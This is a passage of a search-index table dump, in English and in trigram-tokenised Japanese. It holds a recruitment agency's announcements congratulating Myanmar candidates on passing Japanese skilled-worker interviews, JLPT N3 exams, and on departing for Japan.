(178, 'ja', 'node_search', '  特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1819 sat 5022026 953  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは phyo thiri htet さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 日本で 本で介 で介護 介護分 護分野 分野の 野のキ のキャ キャリ ャリア リアを アを築 を築く 築くた くため ための めの大 の大切 大切な 切な一 な一歩 一歩と 歩とな となり なりま りまし ました これま れまで までの での努 の努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 素晴ら 晴らし らしい しい成 い成果 成果に 果につ につな つなが ながり がりま りまし ました 今後の 後の手 の手続 手続き 続きが きが順 が順調 順調に 調に進 に進み 日本で 本での での新 の新た 新たな たな挑 な挑戦 挑戦が 戦が実 が実り 実り多 り多い 多いも いもの ものと のとな となる なるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります 介護分 護分野 分野で 野での でのさ のさら さらな らなる なるご るご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます phyo thiri htet さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(179, 'en', 'node_search', ' successful food service interview result successful food service interview result admin fri 6192026 1822 tue 2032026 923 interview success announcement new comet trading agency is pleased to share another successful interview result from our tokutei ginou food service program ms myat thandar kyaw has successfully passed the interview for a specified skilled worker food service position in japan this achievement reflects not only her dedication and effort but also the importance of proper preparation and training throughout the recruitment process at new comet trading agency we remain committed to connecting qualified myanmar candidates with reliable employment opportunities in japan and supporting them throughout their career journey we sincerely congratulate ms myat thandar kyaw and wish her continued success in the upcoming procedures and future employment in japan ms myat thandar kyaw successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(179, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1823 tue 2032026 923  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 特定技 定技能 外食業 プログ ログラ グラム ラムに ムにお におけ おける ける嬉 る嬉し 嬉しい しい合 い合格 合格結 格結果 結果を 果をご をご報 ご報告 報告い 告いた いたし たしま します myat thandar kyaw さんが 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱意 熱意の 意の成 の成果 成果で 果であ である あると るとと ととも ともに 面接に 接に向 に向け 向けた けた準 た準備 準備と 備と学 と学習 学習の 習の積 の積み 積み重 み重ね 重ねに ねによ による よるも るもの もので のです ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後も 後もミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材と 材と日 と日本 日本企 本企業 企業を 業を結 を結び 結びつ びつけ つける ける架 る架け 架け橋 け橋と 橋とし として 就職活 職活動 活動か 動から から渡 ら渡日 渡日後 日後ま 後まで まで継 で継続 継続的 続的な 的な支 な支援 支援を 援を行 を行っ 行って ってま てまい まいり いりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します myat thandar kyaw さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(180, 'en', 'node_search', ' food service candidate achieves interview success food service candidate achieves interview success admin fri 6192026 1824 tue 2032026 925 celebrating a successful interview result new comet trading agency is delighted to announce that ms hsu wyne wyne pyae has successfully passed the interview for a specified skilled worker food service position in japan this accomplishment reflects her commitment perseverance and determination to pursue employment opportunities in japan passing the interview is an important step toward building a professional career abroad and demonstrates her readiness for the challenges and opportunities ahead we sincerely congratulate ms hsu wyne wyne pyae on this achievement and wish her success throughout the remaining procedures and her future career in japan ms hsu wyne wyne pyae successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(180, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1826 tue 2032026 925  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは hsu wyne wyne pyae さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と継 と継続 継続的 続的な 的な学 な学習 学習の 習の成 の成果 成果で 果であ であり 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな前 な前進 前進と 進とな となり なりま りまし ました 面接合 接合格 合格は 格は新 は新た 新たな たなキ なキャ キャリ ャリア リアへ アへの への重 の重要 重要な 要な第 な第一 第一歩 一歩で 歩であ であり 今後の 後の活 の活躍 活躍が 躍が大 が大い 大いに いに期 に期待 期待さ 待され されま れます 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での でのご のご活 ご活躍 活躍と 躍とさ とさら さらな らなる なる成 る成功 成功を 功をお をお祈 お祈り 祈りい りいた いたし たしま します hsu wyne wyne pyae さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(181, 'en', 'node_search', ' student successfully passed jlpt n3 examination student successfully passed jlpt n3 examination admin fri 6192026 1828 fri 1302026 929 jlpt n3 success achievement new comet language center is proud to announce that ms su su san has successfully passed the japanese language proficiency test jlpt n3 examination having completed her n5 n4 and n3 studies at new comet language center she demonstrated dedication perseverance and a strong commitment to improving her japanese language skills passing the jlpt n3 examination is a significant achievement and an important milestone for those pursuing higher education career development and employment opportunities in japan we sincerely congratulate ms su su san on her success and wish her continued progress in her japanese language studies and future endeavors ms su su san successfully passed the jlpt n3 examination after completing n5 n4 and n3 studies at new comet language center  ', 0),
(181, 'ja', 'node_search', ' jlpt n3 合格の 格のお のお知 お知ら 知らせ  jlpt n3 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1830 fri 1302026 929 jlpt n3 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います   ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校は su su san さんが んが日 が日本 日本語 本語能 語能力 能力試 力試験 jlpt n3 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します su su san さんは 当校で n5 n4 n3 の学習 学習課 習課程 課程を 程を修 を修了 修了し 日 々 の努力 努力と 力と継 と継続 継続的 続的な 的な学 な学習 学習を 習を通 を通じ 通じて じて今 て今回 今回の 回の素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を達 を達成 達成さ 成され されま れまし ました jlpt n3 の合格 合格は 日本語 本語能 語能力 能力の 力の向 の向上 向上を 上を証 を証明 証明す 明する する重 る重要 重要な 要な成 な成果 成果で 果であ であり 日本で 本での での進 の進学 進学や 学や就 や就職 就職へ 職への への大 の大き 大きな きな一 な一歩 一歩と 歩とな となり なりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後のさ のさら さらな らなる なる成 る成長 成長と 長とご とご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します su su san さんが んがニ がニュ ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校で 校で学 で学習 学習し jlpt n3 試験に 験に合 に合格 合格さ 格され されま れまし ました  ', 0),
(182, 'en', 'node_search', ' from n5 to n3 a successful learning journey from n5 to n3 a successful learning journey admin fri 6192026 1831 fri 1302026 932 celebrating academic progress and success new comet language center is delighted to announce that ms aye thazin has successfully passed the japanese language proficiency test jlpt n3 examination her achievement is the result of continuous learning and dedication throughout her studies from n5 to n3 at new comet language center the successful completion of the jlpt n3 level demonstrates not only improved language proficiency but also a strong commitment to personal and professional development we are proud of her accomplishment and look forward to seeing her continue to advance toward even greater goals in japanese language education and future career opportunities congratulations on this outstanding achievement ms aye thazin successfully passed the jlpt n3 examination after studying n5 n4 and n3 courses at new comet language center ', 0),
(182, 'ja', 'node_search', ' n5 から n3 へ 学習成 習成果 成果の 果のご のご報 ご報告  n5 から n3 へ 学習成 習成果 成果の 果のご のご報 ご報告 admin fri 6192026 1833 fri 1302026 932  学習の 習の成 の成果 成果と jlpt n3 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校は aye thazin さんが んが日 が日本 日本語 本語能 語能力 能力試 力試験 jlpt n3 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します aye thazin さんは 当校で n5 から n3 まで継 で継続 継続し 続して して学 て学習 学習さ 習され 努力を 力を積 を積み 積み重 み重ね 重ねた ねた結 た結果 今回の 回の素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を達 を達成 達成さ 成され されま れまし ました jlpt n3 合格は 日本語 本語能 語能力 能力の 力の向 の向上 向上を 上を証 を証明 証明す 明する するだ るだけ だけで けでな でなく 将来の 来の進 の進学 進学や 学や就 や就職 就職に 職に向 に向け 向けた けた大 た大切 大切な 切なス なステ ステッ テップ ップで プでも でもあ もあり ありま ります 今後も 後もさ もさら さらな らなる なる日 る日本 日本語 本語能 語能力 能力の 力の向 の向上 向上と 上とご とご活 ご活躍 活躍を 躍を心 を心よ 心より より期 り期待 期待し 待して してお ており おりま ります おめで めでと でとう とうご うござ ござい ざいま います  aye thazin さんが んがニ がニュ ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校で 校で学 で学習 学習し jlpt n3 試験に 験に合 に合格 合格さ 格され されま れまし ました  ', 0),
(183, 'en', 'node_search', ' jlpt n3 success opens new opportunities jlpt n3 success opens new opportunities admin fri 6192026 1834 fri 1302026 934 a new milestone in japanese language learning new comet language center is pleased to announce that ms aye pwint phyu has successfully passed the japanese language proficiency test jlpt n3 examination after completing her n5 n4 and n3 studies at new comet language center she achieved this important milestone through consistent effort and dedication to language learning obtaining jlpt n3 certification creates new opportunities for further education professional development and employment pathways related to japan we are delighted to celebrate her success and encourage her to continue pursuing higher levels of japanese language proficiency in the future congratulations on this wonderful achievement and we wish her continued success in all future endeavors ms aye pwint phyu successfully passed the jlpt n3 examination after completing japanese language studies at new comet language center ', 0),
(183, 'ja', 'node_search', ' jlpt n3 合格に 格によ により より広 り広が 広がる がる新 る新た 新たな たな可 な可能 可能性  jlpt n3 合格に 格によ により より広 り広が 広がる がる新 る新た 新たな たな可 な可能 可能性 admin fri 6192026 1835 fri 1302026 934 jlpt n3 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校は aye pwint phyu さんが んが日 が日本 日本語 本語能 語能力 能力試 力試験 jlpt n3 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します n5 n4 n3 の学習 学習課 習課程 課程を 程を修 を修了 修了し 継続的 続的な 的な努 な努力 努力を 力を重 を重ね 重ねた ねた結 た結果 今回の 回の素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を達 を達成 達成さ 成され されま れまし ました jlpt n3 の取得 取得は 日本語 本語能 語能力 能力の 力の向 の向上 向上を 上を証 を証明 証明す 明する するだ るだけ だけで けでな でなく 進学や 学や就 や就職 就職な 職など など将 ど将来 将来の 来のさ のさま さまざ まざま ざまな まな可 な可能 可能性 能性を 性を広 を広げ 広げる げる重 る重要 重要な 要な資 な資格 資格で 格でも でもあ もあり ありま ります 今後も 後もさ もさら さらな らなる なる目 る目標 目標に 標に向 に向か 向かっ かって って挑 て挑戦 挑戦を 戦を続 を続け 続けら けられ ますま すます ます活 す活躍 活躍さ 躍され される れるこ ること ことを とを心 を心よ 心より より期 り期待 期待し 待して してお ており おりま ります おめで めでと でとう とうご うござ ござい ざいま います  aye pwint phyu さんが んがニ がニュ ニュー ューコ ーコメ コメッ メット ット日 ト日本 日本語 本語学 語学校 学校で 校で学 で学習 学習し jlpt n3 試験に 験に合 に合格 合格さ 格され されま れまし ました  ', 0),
(184, 'en', 'node_search', ' two food service workers depart for japan after months of preparation two food service workers depart for japan after months of preparation admin fri 6192026 1838 mon 1262026 938 departure to japan 26 january 2026 new comet trading agency is pleased to announce that ms ei ei phyoe and ms moe moe zaw successfully departed for japan under the specified skilled worker food service program before reaching this important stage both candidates completed language learning interview preparation and employment procedures required for overseas work in japan their departure reflects the effort commitment and determination they demonstrated throughout the preparation process as they begin their careers in japan s food service industry we wish them success valuable professional experiences and continued growth in their new working environment ms ei ei phyoe and ms moe moe zaw departed for japan on 26 january 2026 under the specified skilled worker food service program  ', 0),
(184, 'ja', 'node_search', '  特定技 定技能 外食業 人材 2 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 外食業 人材 2 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1840 mon 1262026 938 2026 年 1 月 26 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは ei ei phyoe さんと moe moe zaw さんが んが特 が特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します お二人 二人は 人は日 は日本 日本で 本で働 で働く 働くた くため ために 日本語 本語学 語学習 学習や 習や面 や面接 面接対 接対策 各種手 種手続 手続き 続きを きを経 を経て 経て今 て今回 今回の 回の出 の出発 出発を 発を迎 を迎え 迎えら えられ られま れまし ました これま れまで まで積 で積み 積み重 み重ね 重ねて ねてき てきた きた努 た努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 新たな たなキ なキャ キャリ ャリア リアへ アへの への第 の第一 第一歩 一歩を 歩を踏 を踏み 踏み出 み出さ 出され されま れます 日本で 本で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がら成 ら成長 成長さ 長され 充実し 実した した仕 た仕事 仕事と 事と生 と生活 生活を 活を送 を送ら 送られ られる れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ei ei phyoe さんと moe moe zaw さんが 2026 年 1 月 26 日に特 に特定 特定技 定技能 外食業 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(185, 'en', 'node_search', ' food service candidate successfully advances to the next stage food service candidate successfully advances to the next stage admin fri 6192026 1841 sat 1242026 943 interview success announcement new comet trading agency is pleased to announce that ms hnin wa than has successfully passed the interview for a specified skilled worker food service position in japan this accomplishment represents an important step toward her professional development and future career in japan through dedication and careful preparation she has successfully progressed to the next stage of the employment process the food service sector continues to provide valuable career opportunities for motivated individuals seeking international work experience and longterm growth we sincerely congratulate ms hnin wa than on her achievement and wish her every success as she prepares for her journey to japan ms hnin wa than successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(185, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1844 sat 1242026 943 i  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは hnin wa than さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 日本で 本での でのキ のキャ キャリ ャリア リア形 ア形成 形成に 成に向 に向け 向けた けた大 た大切 大切な 切な一 な一歩 一歩と 歩とな となり なりま りまし ました ご本人 本人の 人の努 の努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 次のス のステ ステー テージ ージへ ジへ進 へ進ま 進まれ まれる れるこ ること ことと ととな となり なりま ります 外食業 食業分 業分野 分野は 多くの くの経 の経験 経験と 験と成 と成長 成長の 長の機 の機会 機会を 会を提 を提供 提供す 供する する魅 る魅力 魅力的 力的な 的な業 な業界 業界で 界であ であり 今後の 後の活 の活躍 活躍が 躍が期 が期待 期待さ 待され されま れます 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での での新 の新た 新たな たな挑 な挑戦 挑戦が 戦が実 が実り 実り多 り多い 多いも いもの ものと のとな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります  hnin wa than さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(186, 'en', 'node_search', ' food service candidate demonstrates readiness for a career in japan food service candidate demonstrates readiness for a career in japan admin fri 6192026 1846 sat 1242026 946 interview success announcement new comet trading agency is delighted to announce that ms yadana lwin has successfully passed the interview for a specified skilled worker food service position in japan her success reflects strong determination careful preparation and a clear commitment to pursuing a career in japan s food service industry passing the interview demonstrates her readiness to take on new responsibilities and embrace the opportunities that await her in an international working environment we are pleased to celebrate this achievement and look forward to supporting her through the next stages of the employment process congratulations to ms yadana lwin on this outstanding accomplishment and we wish her continued success in her future career ms yadana lwin successfully passed the interview for a specified skilled worker food service position in japan  ', 0),
(186, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1847 sat 1242026 946  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは yadana lwin さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の強 の強い 強い意 い意志 意志と 志と努 と努力 そして して日 て日本 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた準 た準備 準備の 備の成 の成果 成果で 果です 面接合 接合格 合格は 格は新 は新た 新たな たなキ なキャ キャリ ャリア リアへ アへの への大 の大切 大切な 切な第 な第一 第一歩 一歩で 歩であ であり 今後の 後の活 の活躍 活躍が 躍が大 が大い 大いに いに期 に期待 期待さ 待され されま れます ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後の 後の手 の手続 手続き 続きや きや日 や日本 日本で 本での での就 の就労 就労に 労に向 に向け 向けて けて引 て引き 引き続 き続き 続きサ きサポ サポー ポート ートし トして してま てまい まいり いりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに さらな らなる なるご るご成 ご成功 成功を 功をお をお祈 お祈り 祈りい りいた いたし たしま します yadana lwin さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(187, 'en', 'node_search', ' a promising future begins with interview success a promising future begins with interview success admin sat 6202026 1026 sat 1242026 928 interview success announcement new comet trading agency is pleased to announce that ms khit yuya soe has successfully passed the interview for a specified skilled worker food service position in japan this achievement marks an important step toward building a successful career in japan s food service industry through dedication and preparation she has earned the opportunity to move forward in the employment process japan s food service sector offers valuable professional experience skill development and longterm career opportunities for motivated individuals we are proud of her accomplishment and look forward to seeing her continue her journey toward employment in japan we sincerely congratulate ms khit yuya soe and wish her every success in the exciting opportunities ahead ms khit yuya soe successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(187, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1028 sat 1242026 928  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは khit yuya soe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 日本の 本の外 の外食 外食業 食業界 業界で 界でキ でキャ キャリ ャリア リアを アを築 を築く 築くた くため ための めの大 の大切 大切な 切な第 な第一 第一歩 一歩と 歩とな となり なりま りまし ました これま れまで までの での努 の努力 努力と 力と準 と準備 準備が 備が実 が実を 実を結 を結び 新たな たなチ なチャ チャン ャンス ンスへ スへの への扉 の扉が 扉が開 が開か 開かれ かれま れまし ました 外食業 食業分 業分野 分野で 野では 多くの くの経 の経験 経験や 験や成 や成長 成長の 長の機 の機会 機会が 会が期 が期待 期待さ 待され されて れてい ていま います 今後の 後の手 の手続 手続き 続きが きが順 が順調 順調に 調に進 に進み 日本で 本での での新 の新し 新しい しい挑 い挑戦 挑戦が 戦が実 が実り 実り多 り多い 多いも いもの ものと のとな となる なるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ご合格 誠にお におめ おめで めでと でとう とうご うござ ござい ざいま います  khit yuya soe さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(188, 'en', 'node_search', ' successful interview result for a future caregiver in japan successful interview result for a future caregiver in japan admin sat 6202026 1052 thu 1222026 953 interview success announcement new comet trading agency is delighted to announce that ms may phyoe thu has successfully passed the interview for a specified skilled worker kaigo position in japan this achievement represents an important milestone in her journey toward a professional career in the caregiving sector through dedication preparation and a genuine desire to support others she has successfully earned this opportunity the caregiving profession plays a vital role in supporting the wellbeing and quality of life of elderly individuals in japan we are confident that she will make a meaningful contribution in her future workplace we sincerely congratulate ms may phyoe thu on her success and wish her continued achievement throughout the upcoming procedures and her future career in japan ms may phyoe thu successfully passed the interview for a specified skilled worker kaigo position in japan  ', 0),
(188, 'ja', 'node_search', '  特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1057 thu 1222026 953  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは may phyoe thu さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 介護分 護分野 分野で 野で活 で活躍 活躍す 躍する すると るとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大切 大切な 切な成 な成果 成果で 果であ であり ご本人 本人の 人の努 の努力 努力と 力と熱 と熱意 熱意の 意の表 の表れ 表れで れです 介護の 護の仕 の仕事 仕事は 高齢者 齢者の 者の生 の生活 生活を 活を支 を支え 支える える大 る大変 大変重 変重要 重要で 要でや でやり やりが りがい がいの いのあ のある ある職 る職業 職業で 業です 今後 日本の 本の介 の介護 介護現 護現場 現場で 場で活 で活躍 活躍さ 躍され される れるこ ること ことを とを大 を大い 大いに いに期 に期待 期待し 待して してお ており おりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での での新 の新た 新たな たな挑 な挑戦 挑戦と 戦とご とご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します may phyoe thu さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(189, 'en', 'node_search', ' commitment and dedication lead to interview success commitment and dedication lead to interview success admin sat 6202026 1101 thu 1222026 902 interview success announcement new comet trading agency is pleased to announce that ms thet mon soe has successfully passed the interview for a specified skilled worker kaigo position in japan this accomplishment reflects her commitment to professional development and her dedication to pursuing a meaningful career in the caregiving field the kaigo sector requires compassion responsibility and a strong willingness to support others through her preparation and determination she has successfully demonstrated these qualities during the interview process we extend our heartfelt congratulations to ms thet mon soe and wish her continued success as she moves forward toward employment and a rewarding career in japan ms thet mon soe successfully passed the interview for a specified skilled worker kaigo position in japan ', 0),
(189, 'ja', 'node_search', '  特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 介護 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1130 thu 1222026 902  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは thet mon soe さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 今回の 回の合 の合格 合格は 介護分 護分野 分野で 野で活 で活躍 活躍し 躍した したい たいと いとい という いう強 う強い 強い意 い意志 意志と 日 々 の努力 努力の 力の成 の成果 成果で 果です 介護の 護の仕 の仕事 仕事に 事には 思いや いやり やりや りや責 や責任 責任感 そして して人 て人を 人を支 を支え 支えた えたい たいと いとい という いう気 う気持 気持ち 持ちが ちが求 が求め 求めら められ られま れます 面接を 接を通 を通じ 通じて そのよ のよう ような うな資 な資質 資質を 質を十 を十分 十分に 分に発 に発揮 発揮さ 揮され された れたこ たこと ことが とが今 が今回 今回の 回の結 の結果 結果に 果につ につな つなが ながり がりま りまし ました 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での での新 の新た 新たな たなキ なキャ キャリ ャリア リアが アが充 が充実 充実し 実した したも たもの ものと のとな となる なるこ ること ことを とを願 を願っ 願って ってお ており おりま ります  thet mon soe さんが んが特 が特定 特定技 定技能 介護 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(190, 'en', 'node_search', ' preparation and determination lead to interview success preparation and determination lead to interview success admin sat 6202026 1131 thu 1222026 940 interview success announcement new comet trading agency is proud to announce that ms wai mon thant has successfully passed the interview for a specified skilled worker food service position in japan achieving a successful interview result requires not only knowledge and skills but also confidence preparation and determination through her dedication and commitment she has earned the opportunity to take the next step toward working in japan this accomplishment represents the beginning of an exciting professional journey within japan s food service industry where valuable experience and future growth opportunities await we sincerely congratulate ms wai mon thant on this achievement and wish her every success in the upcoming procedures and her future career in japan ms wai mon thant successfully passed the interview for a specified skilled worker food service position in japan ', 0),
(190, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin sat 6202026 1139 i  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは wai mon thant さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します 面接合 接合格 合格は 知識や 識や技 や技術 技術だ 術だけ だけで けでな でなく 努力と 力と準 と準備 準備の 備の積 の積み 積み重 み重ね 重ねに ねによ によっ よって って達 て達成 達成さ 成され される れる大 る大切 大切な 切な成 な成果 成果で 果です 今回の 回の合 の合格 合格に 格によ により 日本の 本の外 の外食 外食業 食業界 業界で 界で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けて けて大 て大き 大きな きな一 な一歩 一歩を 歩を踏 を踏み 踏み出 み出さ 出され されま れまし ました 今後の 後の手 の手続 手続き 続きが きが順 が順調 順調に 調に進 に進み 日本で 本で多 で多く 多くの くの経 の経験 経験を 験を積 を積み 積みな みなが ながら がらご らご活 ご活躍 活躍さ 躍され される れるこ ること ことを とを心 を心よ 心より より願 り願っ 願って ってお ており おりま ります ご合格 誠にお におめ おめで めでと でとう とうご うござ ござい ざいま います  wai mon thant さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され 